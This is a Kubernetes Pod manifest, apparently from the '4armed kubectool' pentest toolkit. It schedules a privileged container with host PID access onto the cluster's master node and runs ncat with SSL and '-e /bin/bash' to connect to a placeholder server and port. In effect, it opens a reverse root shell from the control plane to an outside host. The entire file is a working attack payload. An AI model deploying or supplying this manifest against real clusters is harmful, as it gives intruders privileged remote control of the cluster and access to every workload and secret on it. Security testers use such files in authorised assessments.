apiVersion: v1
kind: Pod
metadata:
  labels:
    run: 4armed-kubectool-master
  name: 4armed-kubectool-master
spec:
  containers:
    - image: docker.io/4armed/kubectool:latest
      imagePullPolicy: Always
      command:
        - /usr/bin/ncat
        - --ssl
        - -e /bin/bash
        - yourserver
        - "yourport"
      name: root
      securityContext:
        privileged: true
      resources:
        requests:
          cpu: 100m
          memory: 128Mi
        limits:
          cpu: 200m
          memory: 256Mi
  hostPID: true
  # Place on master
  tolerations:
   - key: node-role.kubernetes.io/master
     effect: NoSchedule
  nodeSelector:
   node-role.kubernetes.io/master: ""
